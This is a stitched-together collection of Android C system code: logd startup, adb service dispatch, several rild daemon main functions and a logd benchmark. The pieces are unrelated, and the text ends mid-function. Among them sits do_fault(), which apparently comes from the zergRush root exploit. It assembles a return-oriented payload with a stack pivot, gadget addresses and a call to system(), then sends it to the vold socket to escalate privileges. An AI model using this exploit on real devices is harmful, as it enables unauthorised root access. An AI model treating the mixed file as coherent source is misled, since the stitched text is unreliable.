// Foreground waits for exit of the main persistent threads
// that are started here. The threads are created to manage
// UNIX domain client sockets for writing, reading and
// controlling the user space logger, and for any additional
// logging plugins like auditd and restart control. Additional
// transitory per-client threads are created for each reader.
int main(int argc, char *argv[]) {
int fdPmesg = -1;
bool klogd = property_get_bool_svelte("logd.klogd");
if (klogd) {
fdPmesg = open("/proc/kmsg", O_RDONLY | O_NDELAY);
}
fdDmesg = open("/dev/kmsg", O_WRONLY);
// issue reinit command. KISS argument parsing.
if ((argc > 1) && argv[1] && !strcmp(argv[1], "--reinit")) {
int sock = TEMP_FAILURE_RETRY(
socket_local_client("logd",
ANDROID_SOCKET_NAMESPACE_RESERVED,
SOCK_STREAM));
if (sock < 0) {
return -errno;
}
static const char reinit[] = "reinit";
ssize_t ret = TEMP_FAILURE_RETRY(write(sock, reinit, sizeof(reinit)));
if (ret < 0) {
return -errno;
}
struct pollfd p;
memset(&p, 0, sizeof(p));
p.fd = sock;
p.events = POLLIN;
ret = TEMP_FAILURE_RETRY(poll(&p, 1, 100));
if (ret < 0) {
return -errno;
}
if ((ret == 0) || !(p.revents & POLLIN)) {
return -ETIME;
}
static const char success[] = "success";
char buffer[sizeof(success) - 1];
memset(buffer, 0, sizeof(buffer));
ret = TEMP_FAILURE_RETRY(read(sock, buffer, sizeof(buffer)));
if (ret < 0) {
return -errno;
}
return strncmp(buffer, success, sizeof(success) - 1) != 0;
}
// Reinit Thread
sem_init(&reinit, 0, 0);
sem_init(&uidName, 0, 0);
sem_init(&sem_name, 0, 1);
pthread_attr_t attr;
if (!pthread_attr_init(&attr)) {
struct sched_param param;
memset(¶m, 0, sizeof(param));
pthread_attr_setschedparam(&attr, ¶m);
pthread_attr_setschedpolicy(&attr, SCHED_BATCH);
if (!pthread_attr_setdetachstate(&attr,
PTHREAD_CREATE_DETACHED)) {
pthread_t thread;
reinit_running = true;
if (pthread_create(&thread, &attr, reinit_thread_start, NULL)) {
reinit_running = false;
}
}
pthread_attr_destroy(&attr);
}
if (drop_privs() != 0) {
return -1;
}
// Serves the purpose of managing the last logs times read on a
// socket connection, and as a reader lock on a range of log
// entries.
LastLogTimes *times = new LastLogTimes();
// LogBuffer is the object which is responsible for holding all
// log entries.
logBuf = new LogBuffer(times);
signal(SIGHUP, reinit_signal_handler);
if (property_get_bool_svelte("logd.statistics")) {
logBuf->enableStatistics();
}
// LogReader listens on /dev/socket/logdr. When a client
// connects, log entries in the LogBuffer are written to the client.
LogReader *reader = new LogReader(logBuf);
if (reader->startListener()) {
exit(1);
}
// LogListener listens on /dev/socket/logdw for client
// initiated log messages. New log entries are added to LogBuffer
// and LogReader is notified to send updates to connected clients.
LogListener *swl = new LogListener(logBuf, reader);
// Backlog and /proc/sys/net/unix/max_dgram_qlen set to large value
if (swl->startListener(300)) {
exit(1);
}
// Command listener listens on /dev/socket/logd for incoming logd
// administrative commands.
CommandListener *cl = new CommandListener(logBuf, reader, swl);
if (cl->startListener()) {
exit(1);
}
// LogAudit listens on NETLINK_AUDIT socket for selinux
// initiated log messages. New log entries are added to LogBuffer
// and LogReader is notified to send updates to connected clients.
bool auditd = property_get_bool("logd.auditd", true);
LogAudit *al = NULL;
if (auditd) {
bool dmesg = property_get_bool("logd.auditd.dmesg", true);
al = new LogAudit(logBuf, reader, dmesg ? fdDmesg : -1);
}
LogKlog *kl = NULL;
if (klogd) {
kl = new LogKlog(logBuf, reader, fdDmesg, fdPmesg, al != NULL);
}
if (al || kl) {
int len = klogctl(KLOG_SIZE_BUFFER, NULL, 0);
if (len > 0) {
len++;
char buf[len];
int rc = klogctl(KLOG_READ_ALL, buf, len);
buf[len - 1] = '\0';
if ((rc >= 0) && kl) {
kl->synchronize(buf);
}
for (char *ptr = NULL, *tok = buf;
(rc >= 0) && ((tok = log_strtok_r(tok, &ptr)));
tok = NULL) {
if (al) {
rc = al->log(tok);
}
if (kl) {
rc = kl->log(tok);
}
}
}
// failure is an option ... messages are in dmesg (required by standard)
if (kl && kl->startListener()) {
delete kl;
}
if (al && al->startListener()) {
delete al;
}
}
TEMP_FAILURE_RETRY(pause());
exit(0);
}
int service_to_fd(const char *name)
{
int ret = -1;
if(!strncmp(name, "tcp:", 4)) {
int port = atoi(name + 4);
name = strchr(name + 4, ':');
if(name == 0) {
ret = socket_loopback_client(port, SOCK_STREAM);
if (ret >= 0)
disable_tcp_nagle(ret);
} else {
#if ADB_HOST
adb_mutex_lock(&dns_lock);
ret = socket_network_client(name + 1, port, SOCK_STREAM);
adb_mutex_unlock(&dns_lock);
#else
return -1;
#endif
}
#ifndef HAVE_WINSOCK /* winsock doesn't implement unix domain sockets */
} else if(!strncmp(name, "local:", 6)) {
ret = socket_local_client(name + 6,
ANDROID_SOCKET_NAMESPACE_RESERVED, SOCK_STREAM);
} else if(!strncmp(name, "localreserved:", 14)) {
ret = socket_local_client(name + 14,
ANDROID_SOCKET_NAMESPACE_RESERVED, SOCK_STREAM);
} else if(!strncmp(name, "localabstract:", 14)) {
ret = socket_local_client(name + 14,
ANDROID_SOCKET_NAMESPACE_ABSTRACT, SOCK_STREAM);
} else if(!strncmp(name, "localfilesystem:", 16)) {
ret = socket_local_client(name + 16,
ANDROID_SOCKET_NAMESPACE_FILESYSTEM, SOCK_STREAM);
#endif
#if ADB_HOST
} else if(!strncmp("dns:", name, 4)){
char *n = strdup(name + 4);
if(n == 0) return -1;
ret = create_service_thread(dns_service, n);
#else /* !ADB_HOST */
} else if(!strncmp("dev:", name, 4)) {
ret = unix_open(name + 4, O_RDWR);
} else if(!strncmp(name, "framebuffer:", 12)) {
ret = create_service_thread(framebuffer_service, 0);
} else if(recovery_mode && !strncmp(name, "recover:", 8)) {
ret = create_service_thread(recover_service, (void*) atoi(name + 8));
} else if (!strncmp(name, "jdwp:", 5)) {
ret = create_jdwp_connection_fd(atoi(name+5));
} else if (!strncmp(name, "log:", 4)) {
ret = create_service_thread(log_service, get_log_file_path(name + 4));
#endif
} else if(!HOST && !strncmp(name, "shell:", 6)) {
if(name[6]) {
ret = create_subprocess(SHELL_COMMAND, "-c", name + 6);
} else {
ret = create_subprocess(SHELL_COMMAND, "-", 0);
}
#if !ADB_HOST
} else if(!strncmp(name, "sync:", 5)) {
ret = create_service_thread(file_sync_service, NULL);
} else if(!strncmp(name, "remount:", 8)) {
ret = create_service_thread(remount_service, NULL);
} else if(!strncmp(name, "reboot:", 7)) {
void* arg = strdup(name + 7);
if(arg == 0) return -1;
ret = create_service_thread(reboot_service, arg);
} else if(!strncmp(name, "root:", 5)) {
ret = create_service_thread(restart_root_service, NULL);
} else if(!strncmp(name, "tcpip:", 6)) {
int port;
if (sscanf(name + 6, "%d", &port) == 0) {
port = 0;
}
ret = create_service_thread(restart_tcp_service, (void *)port);
} else if(!strncmp(name, "usb:", 4)) {
ret = create_service_thread(restart_usb_service, NULL);
#endif
#if 0
} else if(!strncmp(name, "echo:", 5)){
ret = create_service_thread(echo_service, 0);
#endif
}
if (ret >= 0) {
close_on_exec(ret);
}
return ret;
}
int main(int argc, char **argv)
{
const char * rilLibPath = NULL;
char **rilArgv;
void *dlHandle;
const RIL_RadioFunctions *(*rilInit)(const struct RIL_Env *, int, char **);
const RIL_RadioFunctions *funcs;
char libPath[PROPERTY_VALUE_MAX];
unsigned char hasLibArgs = 0;
int i;
umask(S_IRGRP | S_IWGRP | S_IXGRP | S_IROTH | S_IWOTH | S_IXOTH);
for (i = 1; i < argc ;) {
if (0 == strcmp(argv[i], "-l") && (argc - i > 1)) {
rilLibPath = argv[i + 1];
i += 2;
} else if (0 == strcmp(argv[i], "--")) {
i++;
hasLibArgs = 1;
break;
} else {
usage(argv[0]);
}
}
ALOGD("Android rild start");
if (rilLibPath == NULL) {
if ( 0 == property_get(LIB_PATH_PROPERTY, libPath, NULL)) {
// No lib sepcified on the command line, and nothing set in props.
// Assume "no-ril" case.
ALOGD("No vendor so");
goto done;
} else {
rilLibPath = libPath;
}
}
/* special override when in the emulator */
#if 1
{
static char* arg_overrides[3];
static char arg_device[32];
int done = 0;
#define REFERENCE_RIL_PATH "/system/lib/libreference-ril.so"
/* first, read /proc/cmdline into memory */
char buffer[1024], *p, *q;
int len;
int fd = open("/proc/cmdline",O_RDONLY);
if (fd < 0) {
RLOGD("could not open /proc/cmdline:%s", strerror(errno));
goto OpenLib;
}
do {
len = read(fd,buffer,sizeof(buffer)); }
while (len == -1 && errno == EINTR);
if (len < 0) {
RLOGD("could not read /proc/cmdline:%s", strerror(errno));
close(fd);
goto OpenLib;
}
close(fd);
if (strstr(buffer, "android.qemud=") != NULL)
{
/* the qemud daemon is launched after rild, so
* give it some time to create its GSM socket
*/
int tries = 5;
#define QEMUD_SOCKET_NAME "qemud"
while (1) {
int fd;
sleep(1);
fd = qemu_pipe_open("qemud:gsm");
if (fd < 0) {
fd = socket_local_client(
QEMUD_SOCKET_NAME,
ANDROID_SOCKET_NAMESPACE_RESERVED,
SOCK_STREAM );
}
if (fd >= 0) {
close(fd);
snprintf( arg_device, sizeof(arg_device), "%s/%s",
ANDROID_SOCKET_DIR, QEMUD_SOCKET_NAME );
arg_overrides[1] = "-s";
arg_overrides[2] = arg_device;
done = 1;
break;
}
RLOGD("could not connect to %s socket: %s",
QEMUD_SOCKET_NAME, strerror(errno));
if (--tries == 0)
break;
}
if (!done) {
RLOGE("could not connect to %s socket (giving up): %s",
QEMUD_SOCKET_NAME, strerror(errno));
while(1)
sleep(0x00ffffff);
}
}
/* otherwise, try to see if we passed a device name from the kernel */
if (!done) do {
#define KERNEL_OPTION "android.ril="
#define DEV_PREFIX "/dev/"
p = strstr( buffer, KERNEL_OPTION );
if (p == NULL)
break;
p += sizeof(KERNEL_OPTION)-1;
q = strpbrk( p, " \t\n\r" );
if (q != NULL)
*q = 0;
snprintf( arg_device, sizeof(arg_device), DEV_PREFIX "%s", p );
arg_device[sizeof(arg_device)-1] = 0;
arg_overrides[1] = "-d";
arg_overrides[2] = arg_device;
done = 1;
} while (0);
if (done) {
argv = arg_overrides;
argc = 3;
i = 1;
hasLibArgs = 1;
rilLibPath = REFERENCE_RIL_PATH;
RLOGD("overriding with %s %s", arg_overrides[1], arg_overrides[2]);
}
}
OpenLib:
#endif
#ifndef MTK_3GDONGLE_SUPPORT
switchUser();
#else
{
char mark_switchuser[PROPERTY_VALUE_MAX];
if ((0 == property_get("rild.mark_switchuser", mark_switchuser, NULL)) || (mark_switchuser[0] == '0') ) {
switchUser();
RLOGD("switch user to radio from root.");
}
}
#endif
dlHandle = dlopen(rilLibPath, RTLD_NOW);
if (dlHandle == NULL) {
RLOGE("dlopen failed: %s", dlerror());
exit(-1);
}
RIL_startEventLoop();
rilInit = (const RIL_RadioFunctions *(*)(const struct RIL_Env *, int, char **))dlsym(dlHandle, "RIL_Init");
if (rilInit == NULL) {
RLOGE("RIL_Init not defined or exported in %s\n", rilLibPath);
exit(-1);
}
if (hasLibArgs) {
rilArgv = argv + i - 1;
argc = argc -i + 1;
} else {
static char * newArgv[MAX_LIB_ARGS];
static char args[PROPERTY_VALUE_MAX];
rilArgv = newArgv;
property_get(LIB_ARGS_PROPERTY, args, "");
argc = make_argv(args, rilArgv);
}
// Make sure there's a reasonable argv[0]
rilArgv[0] = argv[0];
funcs = rilInit(&s_rilEnv, argc, rilArgv);
RIL_register(funcs);
done:
while(1) {
// sleep(UINT32_MAX) seems to return immediately on bionic
sleep(0x00ffffff);
}
}
// Must be functionally identical to liblog internal __send_log_msg.
static void send_to_control(char* buf, size_t len) {
int sock =
socket_local_client("logd", ANDROID_SOCKET_NAMESPACE_RESERVED, SOCK_STREAM | SOCK_CLOEXEC);
if (sock < 0) return;
size_t writeLen = strlen(buf) + 1;
ssize_t ret = TEMP_FAILURE_RETRY(write(sock, buf, writeLen));
if (ret <= 0) {
close(sock);
return;
}
while ((ret = read(sock, buf, len)) > 0) {
if (((size_t)ret == len) || (len < PAGE_SIZE)) {
break;
}
len -= ret;
buf += ret;
struct pollfd p = {.fd = sock, .events = POLLIN, .revents = 0 };
ret = poll(&p, 1, 20);
if ((ret <= 0) || !(p.revents & POLLIN)) {
break;
}
}
close(sock);
}
static void BM_lookupEventTagNum_logd_new(benchmark::State& state) {
fprintf(stderr,
"WARNING: "
"This test can cause logd to grow in size and hit DOS limiter\n");
// Make copies
static const char empty_event_log_tags[] = "# content owned by logd\n";
static const char dev_event_log_tags_path[] = "/dev/event-log-tags";
std::string dev_event_log_tags;
if (android::base::ReadFileToString(dev_event_log_tags_path,
&dev_event_log_tags) &&
(dev_event_log_tags.length() == 0)) {
dev_event_log_tags = empty_event_log_tags;
}
static const char data_event_log_tags_path[] =
"/data/misc/logd/event-log-tags";
std::string data_event_log_tags;
if (android::base::ReadFileToString(data_event_log_tags_path,
&data_event_log_tags) &&
(data_event_log_tags.length() == 0)) {
data_event_log_tags = empty_event_log_tags;
}
while (state.KeepRunning()) {
char buffer[256];
memset(buffer, 0, sizeof(buffer));
log_time now(CLOCK_MONOTONIC);
char name[64];
snprintf(name, sizeof(name), "a%" PRIu64, now.nsec());
snprintf(buffer, sizeof(buffer), "getEventTag name=%s format=\"(new|1)\"",
name);
state.ResumeTiming();
send_to_control(buffer, sizeof(buffer));
state.PauseTiming();
}
// Restore copies (logd still know about them, until crash or reboot)
if (dev_event_log_tags.length() &&
!android::base::WriteStringToFile(dev_event_log_tags,
dev_event_log_tags_path)) {
fprintf(stderr,
"WARNING: "
"failed to restore %s\n",
dev_event_log_tags_path);
}
if (data_event_log_tags.length() &&
!android::base::WriteStringToFile(data_event_log_tags,
data_event_log_tags_path)) {
fprintf(stderr,
"WARNING: "
"failed to restore %s\n",
data_event_log_tags_path);
}
fprintf(stderr,
"WARNING: "
"Restarting logd to make it forget what we just did\n");
system("stop logd ; start logd");
}
static int do_fault()
{
char buf[255];
int sock = -1, n = 0, i;
char s_stack_addr[5], s_stack_pivot_addr[5], s_pop_r0_addr[5], s_system[5], s_bsh_addr[5], s_heap_addr[5];
uint32_t bsh_addr;
char padding[128];
int32_t padding_sz = (jumpsz == 0 ? 0 : gadget_jumpsz - jumpsz);
if(samsung) {
printf("[*] Sleeping a bit (~40s)...\n");
sleep(40);
printf("[*] Waking !\n");
}
memset(padding, 0, 128);
strcpy(padding, "LORDZZZZzzzz");
if(padding_sz > 0) {
memset(padding+12, 'Z', padding_sz);
printf("[*] Popping %d more zerglings\n", padding_sz);
}
else if(padding_sz < 0) {
memset(padding, 0, 128);
memset(padding, 'Z', 12+padding_sz);
}
if ((sock = socket_local_client("vold", ANDROID_SOCKET_NAMESPACE_RESERVED, SOCK_STREAM)) < 0)
die("[-] Error creating Nydus");
sprintf(s_stack_addr, "%c%c%c%c", stack_addr & 0xff, (stack_addr>>8)&0xff, (stack_addr>>16)&0xff, (stack_addr>>24)&0xff);
sprintf(s_stack_pivot_addr, "%c%c%c%c", stack_pivot & 0xff, (stack_pivot>>8)&0xff, (stack_pivot>>16)&0xff, (stack_pivot>>24)&0xff);
sprintf(s_pop_r0_addr, "%c%c%c%c", pop_r0 & 0xff, (pop_r0>>8)&0xff, (pop_r0>>16)&0xff, (pop_r0>>24)&0xff);
sprintf(s_system, "%c%c%c%c", system_ptr & 0xff, (system_ptr>>8)&0xff, (system_ptr>>16)&0xff, (system_ptr>>24)&0xff);
sprintf(s_heap_addr, "%c%c%c%c", heap_addr & 0xff, (heap_addr>>8)&0xff, (heap_addr>>16)&0xff, (heap_addr>>24)&0xff);
if(adjust)
strcpy(buf, "ZERGZERG");
else
strcpy(buf, "ZERG");
strcat(buf, " ZZ ");
strcat(buf, s_stack_pivot_addr);
for(i=3; i < buffsz+1; i++)
strcat(buf, " ZZZZ");
strcat(buf, " ");
strcat(buf, s_heap_addr);
n = strlen(buf);
bsh_addr = stack_addr + n + 1 + 8 + 8 + 8 + padding_sz + 12 + 4;
if(check_addr(bsh_addr) == -1) {
printf("[-] Colossus, we're doomed!\n");
exit(-1);
}
sprintf(s_bsh_addr, "%c%c%c%c", bsh_addr & 0xff, (bsh_addr>>8)&0xff, (bsh_addr>>16)&0xff, (bsh_addr>>24)&0xff);
n += sprintf(buf+n+1, "%s%s OVER%s%s%s%sZZZZ%s%c", s_stack_addr, s_heap_addr, padding, s_pop_r0_addr, s_bsh_addr, s_system, bsh, 0);
printf("[*] Sending %d zerglings ...\n", n);
if ((n = write(sock, buf, n+1)) < 0)
die("[-] Nydus seems broken");
sleep(3);
close(sock);
return n;
}
int service_to_fd(const char *name)
{
int ret = -1;
if(!strncmp(name, "tcp:", 4)) {
int port = atoi(name + 4);
name = strchr(name + 4, ':');
if(name == 0) {
ret = socket_loopback_client(port, SOCK_STREAM);
if (ret >= 0)
disable_tcp_nagle(ret);
} else {
#if ADB_HOST
ret = socket_network_client(name + 1, port, SOCK_STREAM);
#else
return -1;
#endif
}
#ifndef HAVE_WINSOCK /* winsock doesn't implement unix domain sockets */
} else if(!strncmp(name, "local:", 6)) {
ret = socket_local_client(name + 6,
ANDROID_SOCKET_NAMESPACE_RESERVED, SOCK_STREAM);
} else if(!strncmp(name, "localreserved:", 14)) {
ret = socket_local_client(name + 14,
ANDROID_SOCKET_NAMESPACE_RESERVED, SOCK_STREAM);
} else if(!strncmp(name, "localabstract:", 14)) {
ret = socket_local_client(name + 14,
ANDROID_SOCKET_NAMESPACE_ABSTRACT, SOCK_STREAM);
} else if(!strncmp(name, "localfilesystem:", 16)) {
ret = socket_local_client(name + 16,
ANDROID_SOCKET_NAMESPACE_FILESYSTEM, SOCK_STREAM);
#endif
#if !ADB_HOST
} else if(!strncmp("dev:", name, 4)) {
ret = unix_open(name + 4, O_RDWR | O_CLOEXEC);
} else if(!strncmp(name, "framebuffer:", 12)) {
ret = create_service_thread(framebuffer_service, 0);
} else if (!strncmp(name, "jdwp:", 5)) {
ret = create_jdwp_connection_fd(atoi(name+5));
} else if(!HOST && !strncmp(name, "shell:", 6)) {
ret = create_subproc_thread(name + 6, SUBPROC_PTY);
} else if(!HOST && !strncmp(name, "exec:", 5)) {
ret = create_subproc_thread(name + 5, SUBPROC_RAW);
} else if(!strncmp(name, "sync:", 5)) {
ret = create_service_thread(file_sync_service, NULL);
} else if(!strncmp(name, "remount:", 8)) {
ret = create_service_thread(remount_service, NULL);
} else if(!strncmp(name, "reboot:", 7)) {
void* arg = strdup(name + 7);
if (arg == NULL) return -1;
ret = create_service_thread(reboot_service, arg);
} else if(!strncmp(name, "root:", 5)) {
ret = create_service_thread(restart_root_service, NULL);
} else if(!strncmp(name, "backup:", 7)) {
char* arg = strdup(name + 7);
if (arg == NULL) return -1;
char* c = arg;
for (; *c != '\0'; c++) {
if (*c == ':')
*c = ' ';
}
char* cmd;
if (asprintf(&cmd, "/system/bin/bu backup %s", arg) != -1) {
ret = create_subproc_thread(cmd, SUBPROC_RAW);
free(cmd);
}
free(arg);
} else if(!strncmp(name, "restore:", 8)) {
ret = create_subproc_thread("/system/bin/bu restore", SUBPROC_RAW);
} else if(!strncmp(name, "tcpip:", 6)) {
int port;
if (sscanf(name + 6, "%d", &port) == 0) {
port = 0;
}
ret = create_service_thread(restart_tcp_service, (void *) (uintptr_t) port);
} else if(!strncmp(name, "usb:", 4)) {
ret = create_service_thread(restart_usb_service, NULL);
} else if (!strncmp(name, "reverse:", 8)) {
char* cookie = strdup(name + 8);
if (cookie == NULL) {
ret = -1;
} else {
ret = create_service_thread(reverse_service, cookie);
if (ret < 0) {
free(cookie);
}
}
} else if(!strncmp(name, "disable-verity:", 15)) {
ret = create_service_thread(disable_verity_service, NULL);
#endif
}
if (ret >= 0) {
close_on_exec(ret);
}
return ret;
}
int main(int argc, char **argv)
{
const char * rilLibPath = NULL;
char **rilArgv;
void *dlHandle;
const RIL_RadioFunctions *(*rilInit)(const struct RIL_Env *, int, char **);
const RIL_RadioFunctions *funcs;
char libPath[PROPERTY_VALUE_MAX];
unsigned char hasLibArgs = 0;
int i;
const char *clientId = NULL;
RLOGD("**RIL Daemon Started**");
RLOGD("**RILd param count=%d**", argc);
umask(S_IRGRP | S_IWGRP | S_IXGRP | S_IROTH | S_IWOTH | S_IXOTH);
for (i = 1; i < argc ;) {
if (0 == strcmp(argv[i], "-l") && (argc - i > 1)) {
rilLibPath = argv[i + 1];
i += 2;
} else if (0 == strcmp(argv[i], "--")) {
i++;
hasLibArgs = 1;
break;
} else if (0 == strcmp(argv[i], "-c") && (argc - i > 1)) {
clientId = argv[i+1];
i += 2;
} else {
usage(argv[0]);
}
}
if (clientId == NULL) {
clientId = "0";
} else if (atoi(clientId) >= MAX_RILDS) {
RLOGE("Max Number of rild's supported is: %d", MAX_RILDS);
exit(0);
}
if (strncmp(clientId, "0", MAX_CLIENT_ID_LENGTH)) {
RIL_setRilSocketName(strncat(rild, clientId, MAX_SOCKET_NAME_LENGTH));
}
if (rilLibPath == NULL) {
if ( 0 == property_get(LIB_PATH_PROPERTY, libPath, NULL)) {
// No lib sepcified on the command line, and nothing set in props.
// Assume "no-ril" case.
goto done;
} else {
rilLibPath = libPath;
}
}
/* special override when in the emulator */
#if 1
{
static char* arg_overrides[5];
static char arg_device[32];
int done = 0;
#define REFERENCE_RIL_PATH "libreference-ril.so"
/* first, read /proc/cmdline into memory */
char buffer[1024], *p, *q;
int len;
int fd = open("/proc/cmdline",O_RDONLY);
if (fd < 0) {
RLOGD("could not open /proc/cmdline:%s", strerror(errno));
goto OpenLib;
}
do {
len = read(fd,buffer,sizeof(buffer)); }
while (len == -1 && errno == EINTR);
if (len < 0) {
RLOGD("could not read /proc/cmdline:%s", strerror(errno));
close(fd);
goto OpenLib;
}
close(fd);
if (strstr(buffer, "android.qemud=") != NULL)
{
/* the qemud daemon is launched after rild, so
* give it some time to create its GSM socket
*/
int tries = 5;
#define QEMUD_SOCKET_NAME "qemud"
while (1) {
int fd;
sleep(1);
fd = qemu_pipe_open("qemud:gsm");
if (fd < 0) {
fd = socket_local_client(
QEMUD_SOCKET_NAME,
ANDROID_SOCKET_NAMESPACE_RESERVED,
SOCK_STREAM );
}
if (fd >= 0) {
close(fd);
snprintf( arg_device, sizeof(arg_device), "%s/%s",
ANDROID_SOCKET_DIR, QEMUD_SOCKET_NAME );
arg_overrides[1] = "-s";
arg_overrides[2] = arg_device;
done = 1;
break;
}
RLOGD("could not connect to %s socket: %s",
QEMUD_SOCKET_NAME, strerror(errno));
if (--tries == 0)
break;
}
if (!done) {
RLOGE("could not connect to %s socket (giving up): %s",
QEMUD_SOCKET_NAME, strerror(errno));
while(1)
sleep(0x00ffffff);
}
}
/* otherwise, try to see if we passed a device name from the kernel */
if (!done) do {
#define KERNEL_OPTION "android.ril="
#define DEV_PREFIX "/dev/"
p = strstr( buffer, KERNEL_OPTION );
if (p == NULL)
break;
p += sizeof(KERNEL_OPTION)-1;
q = strpbrk( p, " \t\n\r" );
if (q != NULL)
*q = 0;
snprintf( arg_device, sizeof(arg_device), DEV_PREFIX "%s", p );
arg_device[sizeof(arg_device)-1] = 0;
arg_overrides[1] = "-d";
arg_overrides[2] = arg_device;
done = 1;
} while (0);
if (done) {
argv = arg_overrides;
argc = 3;
i = 1;
hasLibArgs = 1;
rilLibPath = REFERENCE_RIL_PATH;
RLOGD("overriding with %s %s", arg_overrides[1], arg_overrides[2]);
}
}
OpenLib:
#endif
switchUser();
dlHandle = dlopen(rilLibPath, RTLD_NOW);
if (dlHandle == NULL) {
RLOGE("dlopen failed: %s", dlerror());
exit(EXIT_FAILURE);
}
RIL_startEventLoop();
rilInit = (const RIL_RadioFunctions *(*)(const struct RIL_Env *, int, char **))dlsym(dlHandle, "RIL_Init");
if (rilInit == NULL) {
RLOGE("RIL_Init not defined or exported in %s\n", rilLibPath);
exit(EXIT_FAILURE);
}
if (hasLibArgs) {
rilArgv = argv + i - 1;
argc = argc -i + 1;
} else {
static char * newArgv[MAX_LIB_ARGS];
static char args[PROPERTY_VALUE_MAX];
rilArgv = newArgv;
property_get(LIB_ARGS_PROPERTY, args, "");
argc = make_argv(args, rilArgv);
}
rilArgv[argc++] = "-c";
rilArgv[argc++] = clientId;
RLOGD("RIL_Init argc = %d clientId = %s", argc, rilArgv[argc-1]);
// Make sure there's a reasonable argv[0]
rilArgv[0] = argv[0];
funcs = rilInit(&s_rilEnv, argc, rilArgv);
RLOGD("RIL_Init rilInit completed");
RIL_register(funcs);
RLOGD("RIL_Init RIL_register completed");
done:
RLOGD("RIL_Init starting sleep loop");
while (true) {
sleep(UINT32_MAX);
}
}
int main(int argc, char **argv)
{
const char * rilLibPath = NULL;
char **rilArgv;
static char * s_argv[MAX_LIB_ARGS] = {NULL};
void *dlHandle;
const RIL_RadioFunctions *(*rilInit)(const struct RIL_Env *, int, char **);
const RIL_RadioFunctions *funcs;
char libPath[PROPERTY_VALUE_MAX];
unsigned char hasLibArgs = 0;
int j = 0;
int i;
static char clientId[3] = {'0'};
RLOGD("**RIL Daemon Started**");
RLOGD("**RILd param count=%d**", argc);
memset(s_argv, 0, sizeof(s_argv));
s_argv[0] = argv[0];
umask(S_IRGRP | S_IWGRP | S_IXGRP | S_IROTH | S_IWOTH | S_IXOTH);
for (i = 1, j = 1; i < argc ;) {
if (0 == strcmp(argv[i], "-l") && (argc - i > 1)) {
rilLibPath = argv[i + 1];
i += 2;
} else if (0 == strcmp(argv[i], "-c") && (argc - i > 1)) {
strncpy(clientId, argv[i+1], strlen(clientId));
i += 2;
} else if (0 == strcmp(argv[i], "--")) {
i++;
hasLibArgs = 1;
memcpy(&s_argv[j], &argv[i], argc-i);
break;
} else {
usage(argv[0]);
}
}
#ifdef QCOM_HARDWARE
if (atoi(clientId) >= MAX_RILDS) {
RLOGE("Max Number of rild's supported is: %d", MAX_RILDS);
exit(0);
}
RLOGD ("RIL Client Id:=%s", clientId);
if (strncmp(clientId, "0", MAX_CLIENT_ID_LENGTH)) {
if (RIL_setRilSocketName) {
RIL_setRilSocketName(clientId);
} else {
RLOGE("Trying to instantiate multiple rild sockets without a compatible libril!");
}
}
#endif
if (rilLibPath == NULL) {
if ( 0 == property_get(LIB_PATH_PROPERTY, libPath, NULL)) {
// No lib sepcified on the command line, and nothing set in props.
// Assume "no-ril" case.
goto done;
} else {
rilLibPath = libPath;
}
}
/* special override when in the emulator */
#if 1
{
static char arg_device[32];
int done = 0;
//连接库地址:/system/lib/libreference-ril.so
#define REFERENCE_RIL_PATH "/system/lib/libreference-ril.so"
/* first, read /proc/cmdline into memory */
char buffer[1024], *p, *q;
int len;
int fd = open("/proc/cmdline",O_RDONLY);
if (fd < 0) {
RLOGD("could not open /proc/cmdline:%s", strerror(errno));
goto OpenLib;
}
do {
len = read(fd,buffer,sizeof(buffer)); }
while (len == -1 && errno == EINTR);
if (len < 0) {
RLOGD("could not read /proc/cmdline:%s", strerror(errno));
close(fd);
goto OpenLib;
}
close(fd);
if (strstr(buffer, "android.qemud=") != NULL)
{
/* the qemud daemon is launched after rild, so
* give it some time to create its GSM socket
*/
int tries = 5;
#define QEMUD_SOCKET_NAME "qemud"
while (1) {
int fd;
sleep(1);
fd = qemu_pipe_open("qemud:gsm");
if (fd < 0) {
fd = socket_local_client(
QEMUD_SOCKET_NAME,
ANDROID_SOCKET_NAMESPACE_RESERVED,
SOCK_STREAM );
}
if (fd >= 0) {
close(fd);
snprintf( arg_device, sizeof(arg_device), "%s/%s",
ANDROID_SOCKET_DIR, QEMUD_SOCKET_NAME );
memset(s_argv, 0, sizeof(s_argv));
s_argv[1] = "-s";
s_argv[2] = arg_device;
done = 1;
break;
}
RLOGD("could not connect to %s socket: %s",
QEMUD_SOCKET_NAME, strerror(errno));
if (--tries == 0)
break;
}
if (!done) {
RLOGE("could not connect to %s socket (giving up): %s",
QEMUD_SOCKET_NAME, strerror(errno));
while(1)
sleep(0x00ffffff);
}
}
/* otherwise, try to see if we passed a device name from the kernel */
if (!done) do {
#define KERNEL_OPTION "android.ril="
#define DEV_PREFIX "/dev/"
p = strstr( buffer, KERNEL_OPTION );
if (p == NULL)
break;
p += sizeof(KERNEL_OPTION)-1;
q = strpbrk( p, " \t\n\r" );
if (q != NULL)
*q = 0;
snprintf( arg_device, sizeof(arg_device), DEV_PREFIX "%s", p );
arg_device[sizeof(arg_device)-1] = 0;
memset(s_argv, 0, sizeof(s_argv));
s_argv[1] = "-d";
s_argv[2] = arg_device;
done = 1;
} while (0);
if (done) {
argc = 3;
i = 1;
hasLibArgs = 1;
rilLibPath = REFERENCE_RIL_PATH;
RLOGD("overriding with %s %s", s_argv[1], s_argv[2]);
}
}
OpenLib:
#endif
//切换UID为AID_RADIO
switchUser();
// 打开链接库
dlHandle = dlopen(rilLibPath, RTLD_NOW);
if (dlHandle == NULL) {
RLOGE("dlopen failed: %s", dlerror());
exit(-1);
}
// 开启EventLoop循环
RIL_startEventLoop();
// 从链接库中(也就是reference-ril.c)寻找RIL_Init函数地址
rilInit = (const RIL_RadioFunctions *(*)(const struct RIL_Env *, int, char **))dlsym(dlHandle, "RIL_Init");
if (rilInit == NULL) {
RLOGE("RIL_Init not defined or exported in %s\n", rilLibPath);
exit(-1);
}
if (hasLibArgs) {
argc = argc-i+1;
} else {
static char * newArgv[MAX_LIB_ARGS];
static char args[PROPERTY_VALUE_MAX];
property_get(LIB_ARGS_PROPERTY, args, "");
argc = make_argv(args, s_argv);
}
// Make sure there's a reasonable argv[0]
s_argv[0] = argv[0];
if (argc >= MAX_LIB_ARGS - 2) {
RLOGE("Max arguments are passed for rild, args count = %d", argc);
exit(0);
}
#ifdef QCOM_HARDWARE
/* Client-id is a qualcomm thing */
s_argv[argc++] = "-c";
s_argv[argc++] = clientId;
#endif
RLOGD("RIL_Init argc = %d clientId = %s", argc, s_argv[argc-1]);
